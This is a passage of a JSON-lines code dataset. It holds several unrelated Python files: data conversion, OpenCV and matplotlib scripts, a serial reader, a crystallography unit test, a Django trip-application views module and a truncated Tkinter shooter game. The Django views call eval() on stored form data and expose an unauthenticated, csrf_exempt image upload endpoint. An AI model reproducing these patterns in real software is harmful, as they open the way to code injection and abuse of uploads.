main()\n","sub_path":"scripts/delete_restored_trashedfilenodes.py","file_name":"delete_restored_trashedfilenodes.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397061460","text":"import numpy, csv, time\nfrom scikits.learn.datasets.misc import dumpvar\n\n\nf = open('01423000.dly', 'r')\nreader = csv.reader(f)\nreader.dialect.delimiter='\\t'\n\nn_comments = 28\nfor i in range(n_comments):\n\treader.next()\n\nLABELS = ['agency', 'station', 'date', 'discharge', 'code']\n\ntable = numpy.array([a for a in reader])\n\nAGENCY, STATION, DATE, DISCHARGE, CODE = table.transpose()\n\n# Write the data in nwis.py\na = open(\"../nwis.py\", \"w\")\na.write('# Autogenerated by convert.py at %s\\n\\n' % \n time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime()))\n\nfor i in range(2,5):\n\ta.writelines(dumpvar(list(table[:,i]), LABELS[i]))\na.close()\n","sub_path":"scikits/learn/datasets/nwis/src/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"155856419","text":"import cv2\r\nimport random\r\n\r\nimg = cv2.imread('n2.jpg')\r\nshape = img.shape\r\nheight = shape[0] / 7\r\nwidth = shape[1] / 7\r\n\r\nfor j in range (1, 8):\r\n j_start = int(height * (j-1))\r\n j_end = int(height * j)\r\n \r\n if j % 2 == 0: #left to right for even numbered row\r\n start = 1\r\n end = 8\r\n step = 1\r\n elif j % 2 != 0: #right to left for odd numbered row\r\n start = 7\r\n end = 0\r\n step = -1\r\n\r\n for i in range (start, end, step):\r\n i_start = int(width * (i-1))\r\n i_end = int(width * i)\r\n \r\n img = cv2.imread('n2.jpg')\r\n\r\n img [ j_start:j_end, i_start:i_end ] = (random.randint (0, 255), random.randint (0, 255), random.randint (0, 255))\r\n\r\n cv2.imshow ('Frame', img)\r\n cv2.waitKey(500)\r\n\r\n\r\n","sub_path":"Assignment 3/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"458862875","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport collections\nimport json\nimport re\n\nfrom accounts.models import Trainee\nfrom aputils.decorators import group_required\nfrom aputils.trainee_utils import is_trainee, trainee_from_user\nfrom braces.views import GroupRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q, Case, When\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.edit import CreateView\n\nfrom .constants import DESTINATION_FIELDS\nfrom .forms import (AnswerForm, GospelTripForm, LocalImageForm, NonTraineeForm,\n SectionFormSet)\nfrom .models import (Answer, Destination, GospelTrip, NonTrainee, Question,\n Section)\nfrom .nontrainee import ApplicationForm, FlightFormSet, PassportForm\nfrom .utils import (export_to_json, get_airline_codes, get_airport_codes,\n import_from_json, section_order_validator)\n\n\nclass GospelTripView(GroupRequiredMixin, CreateView):\n model = GospelTrip\n template_name = 'gospel_trips/gospel_trips_admin.html'\n form_class = GospelTripForm\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n ctx = super(GospelTripView, self).get_context_data(**kwargs)\n ctx['gospel_trips'] = GospelTrip.objects.order_by('-open_time')\n ctx['page_title'] = 'Gospel Trip Admin'\n return ctx\n\n\n@group_required(['training_assistant'])\ndef gospel_trip_admin_update(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n context = {'page_title': 'Gospel Trip Editor'}\n data = request.POST\n\n if request.method == \"POST\":\n form_set = SectionFormSet(data, instance=gt)\n form = GospelTripForm(data, instance=gt)\n\n if form.is_valid() and form_set.is_valid():\n form.save()\n form_set.save()\n\n gt_u = GospelTrip.objects.get(pk=pk)\n nk = gt_u.section_set.last().pk\n gt_u.set_section_order(section_order_validator(data, nk))\n return HttpResponseRedirect(\"\")\n else:\n context['section_formset'] = form_set\n context['gt_form'] = form\n else:\n context['section_formset'] = SectionFormSet(instance=gt)\n context['gt_form'] = GospelTripForm(instance=gt)\n return render(request, 'gospel_trips/gospel_trips_admin_update.html', context=context)\n\n\n@group_required(['training_assistant'])\ndef gospel_trip_admin_delete(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n if request.is_ajax and request.method == \"DELETE\":\n gt.delete()\n return JsonResponse({'success': True})\n\n\n@group_required(['training_assistant'])\ndef gospel_trip_admin_duplicate(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n path = export_to_json(gt)\n import_from_json(path)\n return redirect('gospel_trips:admin-create')\n\n\ndef gospel_trip_base(request):\n admin_pk = next((gt.pk for gt in GospelTrip.objects.order_by('-open_time') if gt.is_open), 0)\n if admin_pk: # is_open is True\n return HttpResponseRedirect(reverse('gospel_trips:gospel-trip', kwargs={'pk': admin_pk}))\n else:\n admin_pk = next((gt.pk for gt in GospelTrip.objects.order_by('-open_time') if gt.keep_open), 0)\n if admin_pk: # keep_open is True\n return HttpResponseRedirect(reverse('gospel_trips:gospel-trip', kwargs={'pk': admin_pk}))\n return HttpResponseRedirect(\"/\")\n\n\ndef rosters_base(request):\n admin_pk = next((gt.pk for gt in GospelTrip.objects.order_by('-open_time') if gt.show_teams), 0)\n if admin_pk: # is_open is True\n return HttpResponseRedirect(reverse('gospel_trips:rosters-all', kwargs={'pk': admin_pk}))\n return HttpResponseRedirect(\"/\")\n\n\ndef gospel_trip_trainee(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n context = {'page_title': gt.name}\n\n if is_trainee(request.user):\n trainee = trainee_from_user(request.user)\n else:\n context['preview_trainees'] = Trainee.objects.all()\n trainee = Trainee.objects.get(id=request.GET.get('trainee', Trainee.objects.first().id))\n context['selected_trainee'] = trainee\n\n section_qs = Section.objects.filter(Q(gospel_trip=gt) & ~Q(show='HIDE'))\n question_qs = Question.objects.filter(Q(section__in=section_qs) & ~Q(answer_type=\"None\"))\n answer_forms = []\n if request.method == \"POST\":\n for q in question_qs:\n answer = Answer.objects.get_or_create(trainee=trainee, gospel_trip=gt, question=q)[0]\n answer_forms.append(\n AnswerForm(request.POST, prefix=q.id, instance=answer, gospel_trip__pk=pk)\n )\n if all(f.is_valid() for f in answer_forms):\n for f in answer_forms:\n answer = f.save(commit=False)\n answer.gospel_trip = gt\n answer.trainee = trainee\n answer.question = Question.objects.get(id=f.prefix)\n answer.save()\n return HttpResponseRedirect(pk)\n else:\n context['answer_forms'] = answer_forms\n else:\n for q in question_qs:\n answer = Answer.objects.get_or_create(trainee=trainee, gospel_trip=gt, question=q)[0]\n answer_forms.append(AnswerForm(prefix=q.id, instance=answer, gospel_trip__pk=pk))\n context['answer_forms'] = answer_forms\n\n context['section_qs'] = section_qs\n context['pk'] = gt.id\n context['AIRPORT_CODES'] = json.dumps(get_airport_codes())\n context['AIRLINE_CODES'] = json.dumps(get_airline_codes())\n return render(request, 'gospel_trips/gospel_trips.html', context=context)\n\n\nclass NonTraineeView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/nontrainee_form.html'\n group_required = ['training_assistant']\n\n def post(self, request, *args, **kwargs):\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n data = request.POST\n application_form = ApplicationForm(data, gospel_trip__pk=gt.pk)\n passport_form = PassportForm(data)\n flight_formset = FlightFormSet(data)\n\n ntpk = self.kwargs.get('ntpk', None)\n if ntpk:\n nt = get_object_or_404(NonTrainee, pk=ntpk)\n nontrainees_form = NonTraineeForm(instance=nt, data=data)\n else:\n nontrainees_form = NonTraineeForm(data=data)\n\n if nontrainees_form.is_valid():\n non_trainee = nontrainees_form.save(commit=False)\n non_trainee.gospel_trip = gt\n forms = [application_form, passport_form, flight_formset]\n if all(f.is_valid() for f in forms):\n d = {'application': application_form.cleaned_data}\n d['passport'] = passport_form.cleaned_data\n d['flights'] = []\n for f in flight_formset:\n if f.cleaned_data and f.cleaned_data['flight_type']:\n d['flights'].append(f.cleaned_data)\n non_trainee.application_data = d\n non_trainee.save()\n\n context = self.get_context_data()\n return super(NonTraineeView, self).render_to_response(context)\n\n def get_context_data(self, **kwargs):\n ctx = super(NonTraineeView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n ntpk = self.kwargs.get('ntpk', None)\n if ntpk:\n nt = get_object_or_404(NonTrainee, pk=ntpk)\n data = nt.application_data\n ctx['application_form'] = ApplicationForm(initial=eval(data.get('application', '{}')), gospel_trip__pk=gt.pk)\n ctx['nontrainee_form'] = NonTraineeForm(instance=nt)\n ctx['passport_form'] = PassportForm(initial=eval(data.get('passport', '{}')))\n ctx['flight_formset'] = FlightFormSet(initial=eval(data.get('flights', '{}')))\n else:\n ctx['application_form'] = ApplicationForm(gospel_trip__pk=gt.pk)\n ctx['nontrainee_form'] = NonTraineeForm()\n ctx['passport_form'] = PassportForm()\n ctx['flight_formset'] = FlightFormSet()\n ctx['nontrainees'] = NonTrainee.objects.filter(gospel_trip=gt)\n return ctx\n\n\nclass NonTraineeReportView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/non_trainee_report.html'\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n ctx = super(NonTraineeReportView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n nontrainees = NonTrainee.objects.filter(gospel_trip=gt)\n decoder = json.JSONDecoder(object_pairs_hook=collections.OrderedDict)\n for ntr in nontrainees:\n data = ntr.application_data\n app_data = eval(data.get('application', '{}'))\n d = decoder.decode(json.dumps(app_data))\n for k, v in d.items():\n if 'destination' in k and bool(v):\n d[k] = Destination.objects.get(pk=v).name\n\n ntr.application = d\n passport_data = eval(data.get('passport', \"{}\"))\n ntr.passport = decoder.decode(json.dumps(passport_data))\n flight_data = eval(data.get('flights', '{}'))\n ntr.flights = decoder.decode(json.dumps(flight_data))\n ctx['nontrainees'] = nontrainees\n return ctx\n\n\nclass GospelTripReportView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/gospel_trip_report.html'\n group_required = ['training_assistant']\n\n @staticmethod\n def get_trainee_dict(gospel_trip, question_qs, general_items):\n data = []\n prefetch = ['trainees']\n prefetch.extend([item for item in general_items if item in DESTINATION_FIELDS])\n destination_qs = Destination.objects.filter(gospel_trip=gospel_trip).prefetch_related(*prefetch)\n\n contacts = f_coords = m_coords = s_coords = []\n if 'trainee_contacts' in general_items:\n contacts = destination_qs.values_list('trainee_contacts', flat=True)\n if 'finance_coords' in general_items:\n f_coords = destination_qs.values_list('finance_coords', flat=True)\n if 'media_coords' in general_items:\n m_coords = destination_qs.values_list('media_coords', flat=True)\n if 'stat_coords' in general_items:\n s_coords = destination_qs.values_list('stat_coords', flat=True)\n\n destination_names = destination_qs.values('name')\n get_these_trainees = Trainee.objects.filter(Q(id__in=gospel_trip.get_submitted_trainees()))\n for t in get_these_trainees:\n ID = t.id\n entry = {\n 'name': t.full_name,\n 'id': ID,\n 'destination': destination_qs.filter(trainees=t).first(),\n 'responses': []}\n responses = question_qs.filter(answer__trainee=t).values('answer_type', 'answer__response')\n for r in responses:\n if r['answer_type'] == 'destinations' and r['answer__response']:\n try:\n r['answer__response'] = destination_names.get(id=r['answer__response'])['name']\n except ObjectDoesNotExist:\n r['answer__response'] = \"Destination Does Not Exist\"\n entry['responses'] = responses\n\n if general_items:\n if contacts:\n entry['trainee_contacts'] = \"Yes\" if ID in contacts else \"\"\n if f_coords:\n entry['finance_coords'] = \"Yes\" if ID in f_coords else \"\"\n if m_coords:\n entry['media_coords'] = \"Yes\" if ID in m_coords else \"\"\n if s_coords:\n entry['stat_coords'] = \"Yes\" if ID in s_coords else \"\"\n if 'term' in general_items:\n entry['term'] = t.current_term\n if 'gender' in general_items:\n entry['gender'] = t.gender\n if 'birthdate' in general_items:\n entry['birthdate'] = t.date_of_birth\n if 'email' in general_items:\n entry['email'] = t.email\n if 'locality' in general_items:\n entry['locality'] = t.locality\n if 'phone' in general_items:\n entry['phone'] = t.meta.phone\n data.append(entry)\n return data\n\n def get_context_data(self, **kwargs):\n ctx = super(GospelTripReportView, self).get_context_data(**kwargs)\n gt = GospelTrip.objects.get(pk=self.kwargs['pk'])\n question_qs = Question.objects.filter(section__gospel_trip=gt).exclude(answer_type=\"None\")\n sections_to_show = Section.objects.filter(id__in=question_qs.values_list('section'))\n\n questions = self.request.GET.getlist('questions', [0])\n preserved = Case(*[When(pk=pk, then=pos) for pos, pk in enumerate(questions)])\n question_qs = question_qs.filter(id__in=questions).order_by(preserved)\n\n general = self.request.GET.getlist('general', [])\n\n general_options = collections.OrderedDict([\n ('trainee_contacts', 'Trainee Contact'),\n ('finance_coords', 'Finance Coord'),\n ('media_coords', 'Media Coord'),\n ('stat_coords', 'Stats Coord'),\n ('term', 'Term'),\n ('gender', 'Gender'),\n ('locality', 'Locality'),\n ('phone', 'Phone'),\n ('email', 'Email'),\n ('birthdate', 'Birthdate')\n\n ])\n\n ctx['questions'] = question_qs\n ctx['chosen'] = question_qs.values_list('id', flat=True)\n ctx['chosen_general'] = general\n ctx['general_options'] = general_options\n ctx['sections'] = sections_to_show\n ctx['trainees'] = self.get_trainee_dict(gt, question_qs, general)\n ctx['page_title'] = 'Gospel Trip Response Report'\n return ctx\n\n\nclass DestinationEditorView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/destination_editor.html'\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n context = super(DestinationEditorView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n context['page_title'] = 'Destination Editor'\n context['destinations'] = Destination.objects.filter(gospel_trip=gt)\n return context\n\n\nclass DestinationByPreferenceView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/by_preference.html'\n group_required = ['training_assistant']\n\n @staticmethod\n def get_trainee_dict(gospel_trip):\n data = []\n destination_qs = Destination.objects.filter(gospel_trip=gospel_trip).prefetch_related(*DESTINATION_FIELDS)\n dest_dict = destination_qs.values('id', 'name', 'trainee_contacts')\n contacts = destination_qs.values_list('trainee_contacts', flat=True)\n f_coords = destination_qs.values_list('finance_coords', flat=True)\n m_coords = destination_qs.values_list('media_coords', flat=True)\n s_coords = destination_qs.values_list('stat_coords', flat=True)\n qs = Trainee.objects.filter(id__in=gospel_trip.get_submitted_trainees()).select_related('locality__city').prefetch_related('trainee_contacts', 'destination')\n all_answers = gospel_trip.answer_set.filter(question__label__startswith='Destination Preference').values('response', 'question__label')\n for t in qs:\n ID = t.id\n answer_set = all_answers.filter(trainee=t)\n data.append({\n 'id': ID,\n 'name': t.full_name,\n 'term': t.current_term,\n 'locality': t.locality.city.name,\n 'destination': 0,\n 'trainee_contact': ID in contacts,\n 'finance_coord': ID in f_coords,\n 'media_coord': ID in m_coords,\n 'stat_coord': ID in s_coords\n })\n dest = dest_dict.filter(trainees__in=[t])\n if dest.exists():\n data[-1]['destination'] = dest.first()['id']\n for a in answer_set:\n if re.match(r'^Destination Preference \\d+$', a['question__label']): # returns None if no match\n if a['response']:\n key = \"preference_\" + a['question__label'].split(\" \")[-1]\n try:\n data[-1][key] = dest_dict.get(id=a['response'])['name']\n except ObjectDoesNotExist:\n data[-1][key] = \"Destination Does Not Exist\"\n\n return data\n\n def get_context_data(self, **kwargs):\n context = super(DestinationByPreferenceView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n dest_choices = [{'id': 0, 'name': ''}]\n dest_choices.extend([d for d in Destination.objects.filter(gospel_trip=gt).values('id', 'name')])\n context['destinations'] = dest_choices\n context['by_preference'] = self.get_trainee_dict(gt)\n context['page_title'] = 'Destination By Preference'\n return context\n\n\nclass DestinationByGroupView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/by_group.html'\n group_required = ['training_assistant']\n\n def post(self, request, *args, **kwargs):\n trainee_ids = request.POST.getlist('choose_trainees', [])\n dest_id = request.POST.get('destination', 0)\n if dest_id:\n dest = Destination.objects.get(id=dest_id)\n new_set = Trainee.objects.filter(id__in=trainee_ids)\n dest.trainees.set(new_set)\n dest.save()\n context = self.get_context_data()\n return super(DestinationByGroupView, self).render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super(DestinationByGroupView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n all_destinations = Destination.objects.filter(gospel_trip=gt)\n if all_destinations.exists():\n if self.request.method == 'POST':\n destination = self.request.POST.get('destination', all_destinations.first().id)\n else:\n destination = self.request.GET.get('destination', all_destinations.first().id)\n dest = Destination.objects.get(id=destination)\n to_exclude = all_destinations.filter(~Q(trainees=None), ~Q(id=dest.id))\n context['chosen'] = dest.trainees.values_list('id', flat=True)\n context['choose_from'] = Trainee.objects.filter(id__in=gt.get_submitted_trainees()).exclude(id__in=to_exclude.values_list('trainees__id'))\n context['unassigned'] = Trainee.objects.filter(id__in=gt.get_submitted_trainees()).filter(Q(destination=None))\n if 'destinit' not in context:\n context['destinit'] = dest.id\n context['all_destinations'] = all_destinations\n else:\n context['no_destinations'] = True\n\n context['page_title'] = 'Destination By Group'\n context['post_url'] = reverse('gospel_trips:by-group', kwargs={'pk': gt.id})\n return context\n\n\nclass RostersAllTeamsView(TemplateView):\n template_name = 'gospel_trips/rosters_all_teams.html'\n\n @staticmethod\n def get_trainee_dict(gospel_trip, destination_qs):\n data = []\n contacts = destination_qs.values_list('trainee_contacts', flat=True)\n for t in Trainee.objects.filter(id__in=gospel_trip.get_submitted_trainees()):\n data.append({\n 'name': t.full_name,\n 'id': t.id,\n 'trainee_contact': t.id in contacts,\n 'destination': destination_qs.filter(trainees=t).first()\n })\n return data\n\n def get_context_data(self, **kwargs):\n context = super(RostersAllTeamsView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n all_destinations = Destination.objects.filter(gospel_trip=gt)\n if is_trainee(self.request.user) and all_destinations.filter(trainees=self.request.user).exists():\n context['destination'] = all_destinations.get(trainees=self.request.user)\n context['page_title'] = context['destination'].name\n if self.request.user.has_group(['training_assistant']):\n context['trainees'] = self.get_trainee_dict(gt, all_destinations)\n context['page_title'] = \"Rosters: All Teams\"\n return context\n\n\nclass RostersIndividualTeamView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/rosters_individual_team.html'\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n context = super(RostersIndividualTeamView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n all_destinations = Destination.objects.filter(gospel_trip=gt)\n destinations = self.request.GET.getlist('destinations', [])\n chosen_destinations = all_destinations.filter(id__in=destinations)\n context['all_destinations'] = all_destinations\n context['destinations'] = chosen_destinations\n context['chosen'] = chosen_destinations.values_list('id', flat=True)\n context['page_title'] = \"Rosters: Individual Teams\"\n return context\n\n\n@group_required(['training_assistant'])\ndef destination_add(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n if request.method == \"POST\":\n name = request.POST.get('destination_name', None)\n if name:\n Destination.objects.get_or_create(gospel_trip=gt, name=name)\n return redirect('gospel_trips:destination-editor', pk=pk)\n\n\n@group_required(['training_assistant'])\ndef destination_remove(request, pk):\n get_object_or_404(GospelTrip, pk=pk)\n if request.method == \"POST\":\n destinations = request.POST.getlist('destinations', [])\n if destinations:\n to_remove = Destination.objects.filter(id__in=destinations)\n to_remove.delete()\n return redirect('gospel_trips:destination-editor', pk=pk)\n\n\n@group_required(['training_assistant'])\ndef destination_edit(request, pk):\n get_object_or_404(GospelTrip, pk=pk)\n if request.method == \"POST\":\n destination = request.POST.get('destination', None)\n name = request.POST.get('destination_edit', None)\n if name and destination:\n obj = get_object_or_404(Destination, pk=destination)\n obj.name = name\n obj.save()\n return redirect('gospel_trips:destination-editor', pk=pk)\n\n\n@group_required(['training_assistant'])\ndef assign_destination(request, pk):\n if request.is_ajax() and request.method == \"POST\":\n dest_id = request.POST.get('destination_id', 0)\n trainee_id = request.POST.get('trainee_id', 0)\n is_contact = request.POST.get('is_contact', 'false') == 'true'\n try:\n tr = Trainee.objects.get(id=trainee_id)\n gt = GospelTrip.objects.get(id=pk)\n old_dests = tr.destination.filter(gospel_trip=gt)\n if old_dests.exists():\n # Even if dest_id is 0, trainee is still removed\n old_dest = old_dests.first()\n old_dest.remove_trainee(tr)\n new_dest = Destination.objects.get(id=dest_id)\n new_dest.trainees.add(tr)\n new_dest.save()\n new_dest.set_trainee_as(tr, 'trainee_contacts',set_to=is_contact)\n return JsonResponse({'success': True})\n except ObjectDoesNotExist:\n return JsonResponse({'success': False})\n return JsonResponse({'success': False})\n\n\n@group_required(['training_assistant'])\ndef assign_trainee_role(request, pk):\n '''Make sure to call assign_destination first'''\n if request.is_ajax() and request.method == \"POST\":\n field = request.POST.get('field', None)\n if field in DESTINATION_FIELDS:\n trainee_id = request.POST.get('trainee_id', 0)\n is_contact = request.POST.get('is_contact', 'false') == 'true'\n try:\n gt = GospelTrip.objects.get(id=pk)\n tr = Trainee.objects.get(id=trainee_id)\n dests = tr.destination.filter(gospel_trip=gt)\n if dests.exists():\n dest = dests.first()\n dest.set_trainee_as(tr, field, set_to=is_contact)\n dest.save()\n return JsonResponse({'success': True})\n else:\n return JsonResponse({'noDest': True})\n except ObjectDoesNotExist:\n return JsonResponse({'dataError': True})\n return JsonResponse({'badRequest': True})\n\n\n@csrf_exempt\ndef upload_image(request):\n form = LocalImageForm(request.POST, request.FILES)\n if form.is_valid():\n f = form.save()\n return JsonResponse({'location': f.file.url}, status=200)\n errors = {f: e.get_json_data() for f, e in form.errors.items()}\n return JsonResponse({'success': 'False', 'errors': errors}, status=500)\n\n\n@group_required(['training_assistant'])\ndef clear_application(request, pk, trainee):\n gt = get_object_or_404(GospelTrip, pk=pk)\n tr = get_object_or_404(Trainee, pk=trainee)\n if request.is_ajax() and request.method == \"POST\":\n Answer.objects.filter(gospel_trip=gt, trainee=tr).update(response=None)\n return JsonResponse({'success': True})\n return JsonResponse({'success': False})\n","sub_path":"ap/gospel_trips/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274198179","text":"\n\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.rcParams['axes.unicode_minus']=False\nplt.subplot(1,1,1)\n\nimport xlrd\ndata1=xlrd.open_workbook('C:\\\\Users\\Administrator\\Desktop\\macroeconomics\\\\gfx.xlsx')\nprint(data1)\n\ntable1=data1.sheets()[0]\nx=table1.col_values(0)\n\ny=table1.col_values(1)\n\nplt.bar(x,y,width=0.5,align='center',label='GDP',color='g')\n\nplt.title('国内生产总值',color='r')\n\nfor a,b in zip(x,y):\n plt.text(a,b,b,ha='center',va='bottom',fontsize=12,rotation=90)\n\nplt.xlabel('年份',color='b')\nplt.ylabel('国内生产总值(亿元)',color='b')\n\nplt.xticks(rotation=40)\n\nplt.legend()\n\nplt.show()\n","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238029447","text":"import serial\nfrom datetime import datetime\n\nser = serial.Serial('/dev/ttyACM0', 9600)\ni = 0\n\nwhile i < 100:\n temperatura = ser.readline().decode('utf-8')\n temperatura = temperatura.strip('\\n')\n \n hora = datetime.now().strftime('%H:%M:%S')\n str = '{};{};{}'.format(i, hora, temperatura)\n print(str)\n i += 1\n","sub_path":"aula9.py","file_name":"aula9.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"525452757","text":"from __future__ import division\n\nimport time, os\nimport iotbx.pdb\nfrom qrefine import super_cell\nfrom libtbx.test_utils import approx_equal\nimport run_tests\n\npdb_str = \"\"\"\nCRYST1 10.000 10.000 10.000 90.00 90.00 90.00 P 1\nATOM 9 O HOH Z 333 5.000 5.000 5.000 1.00137.30 O\nTER\n\"\"\"\n\npdb_str_super_sphere_answer = \"\"\"\nCRYST1 10.000 10.000 10.000 90.00 90.00 90.00 P 1\nSCALE1 0.100000 0.000000 0.000000 0.00000\nSCALE2 0.000000 0.100000 0.000000 0.00000\nSCALE3 0.000000 0.000000 0.100000 0.00000\nATOM 1 O HOH Z 333 5.000 5.000 5.000 1.00137.30 O\nTER\nATOM 1 O HOHSS 0 5.000 5.000 15.000 1.00137.30 O\nATOM 1 O HOHSS 1 5.000 -5.000 5.000 1.00137.30 O\nATOM 1 O HOHSS 2 5.000 5.000 -5.000 1.00137.30 O\nATOM 1 O HOHSS 3 5.000 15.000 5.000 1.00137.30 O\nATOM 1 O HOHSS 4 -5.000 5.000 5.000 1.00137.30 O\nATOM 1 O HOHSS 5 15.000 5.000 5.000 1.00137.30 O\nTER\n\"\"\"\n\ndef run(prefix):\n \"\"\"\n Exercise supercell.\n \"\"\"\n of = open(\"%s.pdb\"%prefix,\"w\")\n print >> of, pdb_str\n of.close()\n pdb_inp = iotbx.pdb.input(source_info=None, lines=pdb_str)\n ph = pdb_inp.construct_hierarchy()\n sites_cart_start = ph.atoms().extract_xyz()\n o = super_cell.expand(\n pdb_hierarchy = ph,\n crystal_symmetry = pdb_inp.crystal_symmetry(),\n select_within_radius = 11)\n #\n o.write_super_cell_selected_in_sphere(file_name=\"%s_super_sphere.pdb\"%prefix)\n sites_cart = ph.atoms().extract_xyz()\n o.update(sites_cart = sites_cart)\n o.write_super_cell_selected_in_sphere(file_name=\"%s_super_sphere.pdb\"%prefix)\n #\n sites_cart_super_sphere_answer = iotbx.pdb.input(source_info=None,\n lines=pdb_str_super_sphere_answer).atoms().extract_xyz()\n super_sphere_answer = list(sites_cart_super_sphere_answer.as_double())\n super_sphere = list(o.ph_super_sphere.atoms().extract_xyz().as_double())\n super_sphere_answer.sort()\n super_sphere.sort()\n assert approx_equal(super_sphere_answer,super_sphere)\n\nif(__name__ == \"__main__\"):\n prefix = os.path.basename(__file__).replace(\".py\",\"\")\n run_tests.runner(function=run, prefix=prefix, disable=False)\n","sub_path":"tests/unit/tst_14.py","file_name":"tst_14.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3415508","text":"\n'''\nVersion : Python 3\n'''\nimport tkinter as tk\nfrom tkinter import *\nfrom winsound import *\nimport random\nimport json\nimport os\n\nclass Defender(object):\n def __init__(self,game): \n self.width = 40 #gestion de la largeur du defender\n self.height = 20 #gestion de la hauteur\n self.move_delta = 20 #gestion de la vitesse de deplacement\n self.max_fired_bullets = 7 #gestion du nombre de projectiles pouvant etre tirés simultanement\n self.fired_bullets = [] #gestion de la mise en memoire des projectiles tirés\n self.point=0\n self.game=game\n self.largeur=game.width\n self.hauteur=game.height\n self.image = PhotoImage(file='Defender.png').zoom(1).subsample(2)\n def install_in(self, canvas):\n dificult=self.game.diff_var.get()\n if dificult==1000:\n self.point_en_plus=10\n self.vie=4 \n if dificult==666:\n self.point_en_plus=20\n self.vie=3\n if dificult==333:\n self.point_en_plus=50\n self.vie=2\n \n self.vie_barre=[None]*self.vie\n self.point=0\n lx = 400 + self.width/2 #Permet de centrer le personnage\n ly = 600 - self.height - 10 #permet d elever le personnage\n #self.id = canvas.create_rectangle(lx, ly, lx + self.width, ly + self.height, fill=\"green\") # creation d un rectangle blanc qui representeras le defender\n self.id=canvas.create_image(lx,ly, image=self.image)\n for i in range(self.vie):\n \n self.aff=canvas.create_rectangle(self.largeur/100 +50*i, 50, self.largeur/100 + self.width +50*i, 50 + self.height, fill=\"green\")\n self.vie_barre[i] = self.aff \n\n \n self.bullet=Bullet(self)\n self.canvas=canvas\n def move_in(self,canvas, dx): \n canvas.move(self.id, dx, 0) #permet de deplacer le defender en fonction de la valleur de dx\n def get_id(self):\n return self.id #retourne l identifiant du defender c'est pratique pour d'autres class\n \n def get_bullet(self):\n return self.fired_bullets #retourne la liste des projectiles tirés par le defender\n \n def fire(self,canvas):\n\n if len(self.fired_bullets) < self.max_fired_bullets: #si la taille de la liste est inférieur a la valleur du nombre max de projectiles que l'on peut tirer alors:\n \n self.bullet=Bullet(self) #création d'un nouvel objet bullet : (c'est un projectile)\n self.bullet.install_in(canvas) #on apelle la methode qui premetteras de desiner un projectile\n self.fired_bullets.append(self.bullet) #on stocke l'objet dans la liste \n def destruction(self,canvas):\n self.bullet.set_destru()\n canvas.delete(self.id)\n self.game.class_score.supr()\n for i in range(self.vie):\n self.canvas.delete(self.vie_barre[i])\n\n def Barre_de_vie(self):\n self.vie-=1\n self.canvas.delete(self.vie_barre[self.vie])\n\n\nclass Explosion(object):\n def __init__(self,game):\n self.canvas=game.canvas\n self.defender=game.defender\n def install_in(self,x,y):\n \n self.musique_explo = PlaySound(\"Explosion.wav\", SND_FILENAME | SND_ASYNC)\n self.image = PhotoImage(file='explosion.gif').zoom(1).subsample(2)\n self.explosion_id=self.canvas.create_image(x, y, image=self.image)\n #print(\"ca explose haaaaaaaaaaaaaaaaaaaaaaaaaa\")\n self.canvas.after(100,self.supr)\n def supr(self):\n self.canvas.delete(self.explosion_id) \n \n\nclass Bullet(object):\n destru=False\n\n def __init__(self,shooter):\n self.radius = 5 #gestion de la 